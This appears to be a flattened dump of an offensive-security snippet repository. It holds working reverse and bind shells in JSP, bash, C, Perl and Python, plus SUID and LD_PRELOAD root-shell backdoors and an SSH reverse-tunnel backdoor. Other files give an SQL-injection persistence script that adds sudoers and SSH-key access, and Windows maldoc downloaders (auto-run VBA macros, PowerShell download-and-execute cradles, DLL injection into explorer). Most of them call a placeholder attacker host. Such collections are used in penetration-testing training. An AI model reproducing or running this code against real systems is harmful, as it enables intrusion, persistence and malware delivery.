{ 33 | if (in != null) { 34 | in.close(); 35 | } 36 | if (out != null) { 37 | out.close(); 38 | } 39 | } catch (Exception exc) {} 40 | } 41 | } 42 | %> 43 | 44 | 45 | 46 | 47 | Test 48 | 49 | 50 |

Test

51 | 52 | 53 | <% 54 | String ip = request.getParameter("ip"); 55 | String port = request.getParameter("port"); 56 | String shell = request.getParameter("shell"); 57 | 58 | if (ip != null && port != null && shell != null) { 59 | try { 60 | Socket sock = new Socket(ip, (new Integer(port)).intValue()); 61 | Process proc = Runtime.getRuntime().exec(shell); 62 | StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); 63 | StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); 64 | outputConnector.start(); 65 | inputConnector.start(); 66 | } 67 | catch (Exception exc) {} 68 | } 69 | %> -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse_bash.java: -------------------------------------------------------------------------------- 1 | String[] cmd = { 2 | "/bin/bash", 3 | "-c", 4 | "exec 5<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done" 5 | }; 6 | Runtime.getRuntime().exec(cmd); 7 | -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse_php.java: -------------------------------------------------------------------------------- 1 | String[] cmd = { 2 | "/bin/sh", 3 | "-c", 4 | "/bin/echo '$sock, 1=>$sock, 2=>$sock), $pipes); ?>' > /tmp/.tomcat.pid; php /tmp/.tomcat.pid" 5 | }; 6 | Runtime.getRuntime().exec(cmd); 7 | -------------------------------------------------------------------------------- /snippets/java/shells/web/webshell.jsp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 |
11 | <%@ page import="java.io.*" %> 12 | <% 13 | String cmd = request.getParameter("cmd"); 14 | String OS = System.getProperty("os.name"); 15 | String[] cmdarr; 16 | String output = ""; 17 | if (cmd != null) { 18 | String s = null; 19 | if (OS.startsWith("Windows")) { 20 | cmdarr = new String[] {"cmd", "/c", cmd}; 21 | } 22 | else { 23 | cmdarr = new String[] {"/bin/sh", "-c", cmd}; 24 | } 25 | try { 26 | Process p = Runtime.getRuntime().exec(cmdarr); 27 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 28 | while((s = sI.readLine()) != null) { 29 | output += s.replace("<", "<").replace(">", ">") + "
"; 30 | } 31 | } catch(IOException e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | %> 36 | 
37 |       <%=output %>
38 |
39 | 40 | 41 | -------------------------------------------------------------------------------- /snippets/java/utils/jenkins_console.groovy: -------------------------------------------------------------------------------- 1 | def sout = new StringBuffer(), serr = new StringBuffer() 2 | def proc = 'VAR_STRING'.execute() 3 | proc.consumeProcessOutput(sout, serr) 4 | proc.waitForOrKill(1500) 5 | println "out> $sout err> $serr" -------------------------------------------------------------------------------- /snippets/linux/backdoors/ssh_reconnect.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | if ps -ef | grep -v grep | grep VAR_ATTACKER_HOST ; then 4 | exit 0 5 | else 6 | sshpass -p 'VAR_PASSWORD' ssh -f -N -T -R2221:localhost:22 VAR_ATTACKER_HOST -p VAR_ATTACKER_PORT -l VAR_USERNAME >> /dev/null & 7 | fi 8 | -------------------------------------------------------------------------------- /snippets/linux/backdoors/suid_popen.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(void) 8 | { 9 | FILE *p; 10 | char ch; 11 | setresuid(0, 0, 0); 12 | setresgid(0, 0, 0); 13 | setgroups(0, NULL); 14 | p = popen("VAR_STRING", "r"); 15 | if (p == NULL) 16 | return(1); 17 | while ((ch=fgetc(p)) != EOF) 18 | putchar(ch); 19 | pclose(p); 20 | return(0); 21 | } -------------------------------------------------------------------------------- /snippets/linux/backdoors/suid_shell.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(void) 8 | { 9 | setresuid(0, 0, 0); 10 | setresgid(0, 0, 0); 11 | setgroups(0, NULL); 12 | putenv("HISTFILE=/dev/null"); 13 | execl("/bin/bash", "[kswapd0]", "-pi", NULL); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /snippets/linux/maldocs/runner-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // msfvenom -p linux/x64/meterpreter/reverse_tcp -e x64/zutto_dekiru lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f c 5 | // gcc -z execstack -s runner.c -o runner 6 | 7 | typedef int(*shellcode_t)(); 8 | 9 | int main(int argc, char ** argv) { 10 | 11 | char xor_key = 'X'; 12 | unsigned char buf[] = "\xc\x10[...]\x1a\x8"; 13 | 14 | int arraysize = (int) sizeof(buf); for (int i=0; i < arraysize - 1; i++) { 15 | buf[i] = buf[i] ^ xor_key; 16 | } 17 | 18 | shellcode_t ret = (shellcode_t)buf; 19 | ret(); 20 | } -------------------------------------------------------------------------------- /snippets/linux/shells/bind/udp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python - < 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define REMOTE_ADDR "VAR_ATTACKER_HOST" 9 | #define REMOTE_PORT VAR_ATTACKER_PORT 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | struct sockaddr_in sa; 14 | int s; 15 | sa.sin_family = AF_INET; 16 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 17 | sa.sin_port = htons(REMOTE_PORT); 18 | s = socket(AF_INET, SOCK_STREAM, 0); 19 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 20 | dup2(s, 0); 21 | dup2(s, 1); 22 | dup2(s, 2); 23 | execve("/bin/sh", 0, 0); 24 | return 0; 25 | } -------------------------------------------------------------------------------- /snippets/linux/shells/reverse/reverse.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 45 | my $ip = 'VAR_ATTACKER_HOST'; 46 | my $port = VAR_ATTACKER_PORT; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^VA\.R\._\.IP$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /snippets/linux/utils/bruteforce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This is a small utility for parallel passwords bruteforcing using 4 | # some tricks in the GNU Linux/bash environment. I wouldn't recommend 5 | # anything above 5k / @tasooshi 6 | 7 | if [[ -z $1 ]]; then 8 | echo "Usage: $0 username passwords.txt" 9 | exit 1 10 | fi 11 | 12 | passwords=($(cat $2)) 13 | SIZE=${#passwords[@]} 14 | TIMEOUT='0.25s' 15 | 16 | for i in ${!passwords[@]}; do 17 | echo -ne "$i / $SIZE\r" 18 | ( echo ${passwords[i]} | timeout $TIMEOUT su - $1 -c 'whoami' 2>/dev/null | grep -ow $1 >/dev/null && echo -e "\n\n$1:${passwords[i]}\n\n" && kill -INT -$$ &) 19 | done 20 | -------------------------------------------------------------------------------- /snippets/linux/utils/ld_preload.c: -------------------------------------------------------------------------------- 1 | /* gcc -fPIC -shared -o pe.so pe.c -nostartfiles */ 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | void _init() { 8 | unsetenv("LD_PRELOAD"); 9 | setgid(0); 10 | setuid(0); 11 | system("/bin/bash"); 12 | } -------------------------------------------------------------------------------- /snippets/linux/utils/persistence.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This is a stub for developing persistence over SSH, using base64-encoded 4 | # MySQL UDF (raptor), a simple SQLi to bypass authorization (LOGIN) and 5 | # another SQL vulnerability to plant a remote execution script (STEP_UPLOAD). 6 | 7 | import base64 8 | import requests 9 | import urllib 10 | 11 | 12 | URL_BASE = 'http://VAR_TARGET_HOST/{}' 13 | 14 | EXEC_BASE = '?cmd=/bin/bash -c "{}"' # Path to cmd/webshell 15 | 16 | DIR_BASE = '/tmp/VAR_STRING' # Temporary directory for storing payloads 17 | 18 | LOGIN = { 19 | 'username': '\' or 1=1#', # Authorization bypass 20 | 'password': '', 21 | } 22 | 23 | UPLOAD_FILENAME = 'shell.php' 24 | 25 | USERNAME = 'VAR_USERNAME' 26 | PASSWORD = 'VAR_PASSWORD' 27 | 28 | STEP_UPLOAD = ( 29 | '2 UNION ALL SELECT 1,2,3,4,5,' 30 | # CONCAT(CHAR(60)[...] == 31 | 'CONCAT(CHAR(60),CHAR(63),CHAR(112),CHAR(104),CHAR(112),CHAR(32),CHAR(101),CHAR(99),CHAR(104),CHAR(111),CHAR(32),CHAR(115),CHAR(104),CHAR(101),CHAR(108),CHAR(108),CHAR(95),CHAR(101),CHAR(120),CHAR(101),CHAR(99),CHAR(40),CHAR(36),CHAR(95),CHAR(71),CHAR(69),CHAR(84),CHAR(91),CHAR(39),CHAR(99),CHAR(109),CHAR(100),CHAR(39),CHAR(93),CHAR(41),CHAR(59),CHAR(63),CHAR(62))' 32 | ' INTO DUMPFILE "/var/www/html/{}"'.format(UPLOAD_FILENAME) 33 | ) 34 | 35 | MYSQL_UDF = ( 36 | 'create table foo(line blob);' 37 | 'insert into foo values(load_file(\'{dir}/raptor_udf2.so\'));' 38 | 'select * from foo into dumpfile \'/usr/lib/raptor_udf2.so\';' 39 | 'create function do_system returns integer soname \'raptor_udf2.so\';' 40 | ) 41 | 42 | USER_ADD = ( 43 | 'select do_system(\'echo "{username} ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers\');' 44 | 'select do_system(\'echo "{username}:{password}" | /usr/sbin/chpasswd\');' 45 | ) 46 | 47 | with open('~/.ssh/id_rsa.pub', 'rb') as fil: 48 | ssh_pub = fil.read() 49 | 50 | USER_SSH = ( 51 | 'select do_system(\'echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config\');' 52 | 'select do_system(\'/etc/init.d/sshd restart\');' 53 | 'select do_system(\'mkdir -p /home/{username}/.ssh\');' 54 | 'select do_system(\'echo "' + ssh_pub + '" > /home/{username}/.ssh/authorized_keys\');' 55 | 'select do_system(\'chmod 600 /home/{username}/.ssh/authorized_keys\');' 56 | 'select do_system(\'chmod 700 /home/{username}/.ssh\');' 57 | 'select do_system(\'chown -R {username}:{username} /home/{username}\');' 58 | 'select do_system(\'chmod g-w /home/{username}\');' 59 | ) 60 | 61 | STEP_ADDUSER = ( 62 | 63 | # 'exec nohup setsid /bin/bash 0&0 2>&0 &', 64 | 'rm -rf {dir}'.format(dir=DIR_BASE), 65 | 'mkdir {dir}'.format(dir=DIR_BASE), 66 | 67 | # UDF for MySQL 68 | 'echo I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQoNCmVudW0g >> {dir}/src.b64'.format(dir=DIR_BASE), 69 | 'echo SXRlbV9yZXN1bHQge1NUUklOR19SRVNVTFQsIFJFQUxfUkVTVUxULCBJTlRfUkVT >> {dir}/src.b64'.format(dir=DIR_BASE), 70 | 'echo VUxULCBST1dfUkVTVUxUfTsNCg0KdHlwZWRlZiBzdHJ1Y3Qgc3RfdWRmX2FyZ3Mg >> {dir}/src.b64'.format(dir=DIR_BASE), 71 | 'echo ew0KCXVuc2lnbmVkIGludAkJYXJnX2NvdW50Ow0KCWVudW0gSXRlbV9yZXN1bHQJ >> {dir}/src.b64'.format(dir=DIR_BASE), 72 | 'echo KmFyZ190eXBlOw0KCWNoYXIgCQkJKiphcmdzOw0KCXVuc2lnbmVkIGxvbmcJCSps >> {dir}/src.b64'.format(dir=DIR_BASE), 73 | 'echo ZW5ndGhzOw0KCWNoYXIJCQkqbWF5YmVfbnVsbDsNCn0gVURGX0FSR1M7DQoNCnR5 >> {dir}/src.b64'.format(dir=DIR_BASE), 74 | 'echo cGVkZWYgc3RydWN0IHN0X3VkZl9pbml0IHsNCgljaGFyCQkJbWF5YmVfbnVsbDsN >> {dir}/src.b64'.format(dir=DIR_BASE), 75 | 'echo Cgl1bnNpZ25lZCBpbnQJCWRlY2ltYWxzOw0KCXVuc2lnbmVkIGxvbmcgCQltYXhf >> {dir}/src.b64'.format(dir=DIR_BASE), 76 | 'echo bGVuZ3RoOw0KCWNoYXIJCQkqcHRyOw0KCWNoYXIJCQljb25zdF9pdGVtOw0KfSBV >> {dir}/src.b64'.format(dir=DIR_BASE), 77 | 'echo REZfSU5JVDsNCg0KaW50IGRvX3N5c3RlbShVREZfSU5JVCAqaW5pdGlkLCBVREZf >> {dir}/src.b64'.format(dir=DIR_BASE), 78 | 'echo QVJHUyAqYXJncywgY2hhciAqaXNfbnVsbCwgY2hhciAqZXJyb3IpDQp7DQoJaWYg >> {dir}/src.b64'.format(dir=DIR_BASE), 79 | 'echo KGFyZ3MtPmFyZ19jb3VudCAhPSAxKQ0KCQlyZXR1cm4oMCk7DQoNCglzeXN0ZW0o >> {dir}/src.b64'.format(dir=DIR_BASE), 80 | 'echo YXJncy0+YXJnc1swXSk7DQoNCglyZXR1cm4oMCk7DQp9DQoNCmNoYXIgZG9fc3lz >> {dir}/src.b64'.format(dir=DIR_BASE), 81 | 'echo dGVtX2luaXQoVURGX0lOSVQgKmluaXRpZCwgVURGX0FSR1MgKmFyZ3MsIGNoYXIg >> {dir}/src.b64'.format(dir=DIR_BASE), 82 | 'echo Km1lc3NhZ2UpDQp7DQoJcmV0dXJuKDApOw0KfQ0K >> {dir}/src.b64'.format(dir=DIR_BASE), 83 | 'cat {dir}/src.b64 | openssl base64 -d >> {dir}/raptor_udf2.c'.format(dir=DIR_BASE), 84 | 'gcc -g -c {dir}/raptor_udf2.c -o {dir}/raptor_udf2.o'.format(dir=DIR_BASE), 85 | 'gcc -g -shared -W1,-soname,raptor_udf2.so -o {dir}/raptor_udf2.so {dir}/raptor_udf2.o -lc'.format(dir=DIR_BASE), 86 | 87 | # MYSQL_UDF 88 | 'echo {sql} >> {dir}/step1.b64'.format( 89 | sql=base64.b64encode(MYSQL_UDF.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 90 | dir=DIR_BASE 91 | ), 92 | 'cat {dir}/step1.b64 | openssl base64 -A -d >> {dir}/step1.sql'.format(dir=DIR_BASE), 93 | 'mysql -f -u root mysql < {dir}/step1.sql'.format(dir=DIR_BASE), 94 | 95 | # USER_ADD 96 | 'echo {sql} >> {dir}/step2.b64'.format( 97 | sql=base64.b64encode(USER_ADD.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 98 | dir=DIR_BASE 99 | ), 100 | 'cat {dir}/step2.b64 | openssl base64 -A -d >> {dir}/step2.sql'.format(dir=DIR_BASE), 101 | 'mysql -f -u root mysql < {dir}/step2.sql'.format(dir=DIR_BASE), 102 | 103 | # USER_SSH 104 | 'echo {sql} >> {dir}/step3.b64'.format( 105 | sql=base64.b64encode(USER_SSH.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 106 | dir=DIR_BASE 107 | ), 108 | 'cat {dir}/step3.b64 | openssl base64 -A -d >> {dir}/step3.sql'.format(dir=DIR_BASE), 109 | 'mysql -f -u root mysql < {dir}/step3.sql'.format(dir=DIR_BASE), 110 | 111 | # Cleanup 112 | 'rm -rf {}'.format(DIR_BASE), 113 | ) 114 | 115 | 116 | with requests.Session() as session: 117 | 118 | print(':: Logging in') 119 | session.post( 120 | URL_BASE.format('index.php'), 121 | data=LOGIN 122 | ) 123 | 124 | print(':: Planting script') 125 | session.get( 126 | URL_BASE.format('edit.php?article=') + STEP_UPLOAD 127 | ) 128 | 129 | print(':: Executing commands') 130 | for cmd in STEP_ADDUSER: 131 | print(cmd) 132 | session.get( 133 | URL_BASE.format(UPLOAD_FILENAME) + EXEC_BASE.format(urllib.quote(cmd)) 134 | ) 135 | 136 | 137 | print('\nDone') 138 | -------------------------------------------------------------------------------- /snippets/linux/utils/port_scanning1.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host=$1 4 | port_first=1 5 | port_last=65535 6 | 7 | for ((port=$port_first; port<=$port_last; port++)) 8 | do 9 | (echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open" 10 | done -------------------------------------------------------------------------------- /snippets/linux/utils/ps_monitoring.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | IFS=$'\n' 4 | 5 | old_process=$(ps -eo command) 6 | 7 | while true; do 8 | new_process=$(ps -eo command) 9 | diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] 10 | sleep 1 11 | old_process=$new_process 12 | done 13 | -------------------------------------------------------------------------------- /snippets/linux/utils/python_pickle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import pickle 4 | import os 5 | import base64 6 | 7 | 8 | class Payload(): 9 | 10 | def __reduce__(self): 11 | cmd = "rm /tmp/shell; mknod /tmp/shell p; nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0/tmp/shell" 12 | return (os.system, (cmd,)) 13 | 14 | 15 | payload = pickle.dumps(Payload()) 16 | print base64.b64encode(payload) 17 | -------------------------------------------------------------------------------- /snippets/linux/utils/so_injection.c: -------------------------------------------------------------------------------- 1 | /* gcc -shared -o expected_path.so -fPIC so_injection.c */ 2 | 3 | #include 4 | #include 5 | 6 | static void inject() __attribute__((constructor)); 7 | 8 | void inject(){ 9 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); 10 | } -------------------------------------------------------------------------------- /snippets/php/recursive_dir.php: -------------------------------------------------------------------------------- 1 | "; 17 | } 18 | } 19 | } 20 | closedir($dh); 21 | } 22 | 23 | if(isset($_GET["dir"])) 24 | { 25 | print_r(list_files($_GET["dir"])); 26 | } 27 | 28 | ?> -------------------------------------------------------------------------------- /snippets/python/port_scanning.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from socket import * 4 | 5 | 6 | if __name__ == '__main__': 7 | target = raw_input('Enter host to scan: ') 8 | target_ip = gethostbyname(target) 9 | print 'Starting scan on host ', target_ip 10 | for i in range(20, 1025): 11 | s = socket(AF_INET, SOCK_STREAM) 12 | result = s.connect_ex((target_ip, i)) 13 | if (result == 0): 14 | print 'Port %d: OPEN' % (i,) 15 | s.close() 16 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Threading.Tasks; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | 6 | 7 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f dll -o shell.dll 8 | 9 | 10 | namespace ConsoleApp { 11 | 12 | class Program { 13 | 14 | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)] 15 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 16 | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)] 17 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 18 | [DllImport("kernel32.dll")] 19 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 20 | [DllImport("kernel32.dll")] 21 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 22 | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] 23 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 24 | [DllImport("kernel32.dll", CharSet=CharSet.Auto)] 25 | public static extern IntPtr GetModuleHandle(string lpModuleName); 26 | 27 | static void Main(string[] args) 28 | { 29 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 30 | String dllName = dir + "\\shell.dll"; 31 | WebClient wc = new WebClient(); 32 | wc.DownloadFile("http://VAR_ATTACKER_HOST/shell.dll", dllName); 33 | Process[] expProc = Process.GetProcessesByName("explorer"); 34 | int pid = expProc[0].Id; 35 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); 36 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 37 | IntPtr outSize; 38 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 39 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 40 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 41 | } 42 | 43 | } 44 | 45 | } 46 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.js: -------------------------------------------------------------------------------- 1 | var url = "https://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/test.doc"; 2 | var req = WScript.CreateObject("MSXML2.ServerXMLHTTP"); 3 | req.open("GET", url, false); 4 | req.setRequestHeader("Pragma", "no-cache"); 5 | req.setRequestHeader("Cache-Control", "no-cache,max-age=0"); 6 | req.setRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT"); 7 | req.send(); 8 | if (req.Status == 200) { 9 | var Stream = WScript.CreateObject("ADODB.Stream"); 10 | Stream.Open(); 11 | Stream.Type = 1; 12 | Stream.Write(req.ResponseBody); 13 | Stream.Position = 0; 14 | Stream.SaveToFile("test.exe", 2); 15 | Stream.Close(); 16 | } 17 | var wsh = new ActiveXObject("WScript.Shell"); 18 | wsh.Run("test.exe"); 19 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.ps1: -------------------------------------------------------------------------------- 1 | IEX (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/Invoke-ReflectivePEInjection.ps1') 2 | $bytes = (New-Object System.Net.WebClient).DownloadData('http://VAR_ATTACKER_HOST/shell.dll') 3 | $procid = (Get-Process -Name explorer).Id 4 | Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid 5 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.vba: -------------------------------------------------------------------------------- 1 | Sub Document_Open() 2 | Init 3 | End Sub 4 | 5 | Sub AutoOpen() 6 | Init 7 | End Sub 8 | 9 | Sub Init() 10 | Dim str As String 11 | Dim shellBin As String 12 | Dim exePath As String 13 | Dim wsh As Object 14 | Set wsh = CreateObject("Wscript.Shell") 15 | 16 | shellBin = "shell.exe" 17 | exePath = ActiveDocument.Path + "\" + shellBin 18 | psCmd = "powershell (New-Object System.Net.WebClient).DownloadFile('http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/" + shellBin + "', '" + shellBin + "')" 19 | wsh.Run psCmd, 0, True 20 | wsh.Run exePath, 0, True 21 | Kill exePath 22 | End Sub 23 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.vbs: -------------------------------------------------------------------------------- 1 | ' msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=443 -f psh-reflection > test.doc 2 | 3 | Set Shell = CreateObject ("WScript.Shell") 4 | Shell.run("powershell -WindowStyle Hidden -ExecutionPolicy Bypass (New-Object Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/test.doc') | IEX") -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.xls: -------------------------------------------------------------------------------- 1 | =msexcel|'..\..\..\Windows\system32\cmd.exe /c calc.exe'!A0 -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-2.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-2.vba: -------------------------------------------------------------------------------- 1 | Sub MyMacro() 2 | Dim str As String 3 | str = "powershell (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/picture.jpg') | IEX" 4 | Shell str, vbHide 5 | End Sub 6 | 7 | Sub Document_Open() 8 | MyMacro 9 | End Sub 10 | 11 | Sub AutoOpen() 12 | MyMacro 13 | End Sub -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | using System.Configuration.Install; 4 | using System.Diagnostics; 5 | 6 | 7 | namespace ConsoleApp 8 | { 9 | 10 | class Program 11 | { 12 | 13 | static void Main(string[] args) 14 | { 15 | Console.WriteLine("This application does no harm."); 16 | } 17 | } 18 | 19 | [System.ComponentModel.RunInstaller(true)] 20 | public class Sample : System.Configuration.Install.Installer 21 | { 22 | 23 | public override void Uninstall(System.Collections.IDictionary savedState) 24 | { 25 | // Code goes here... 26 | } 27 | } 28 | 29 | } -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.inf: -------------------------------------------------------------------------------- 1 | ;cmstp.exe /s cmstp.inf 2 | 3 | [version] 4 | Signature=$chicago$ 5 | AdvancedINF=2.5 6 | 7 | [DefaultInstall_SingleUser] 8 | UnRegisterOCXs=UnRegisterOCXSection 9 | 10 | [UnRegisterOCXSection] 11 | %11%\scrobj.dll,NI,https://VAR_ATTACKER_HOST:ATTACKER_PORT/test.sct 12 | 13 | [Strings] 14 | AppAct = "SOFTWARE\Microsoft\Connection Manager" 15 | ServiceName="Yay" 16 | ShortSvcName="Yay" -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 9 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 22 | 23 | 24 | 25 | 26 | 34 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.url: -------------------------------------------------------------------------------- 1 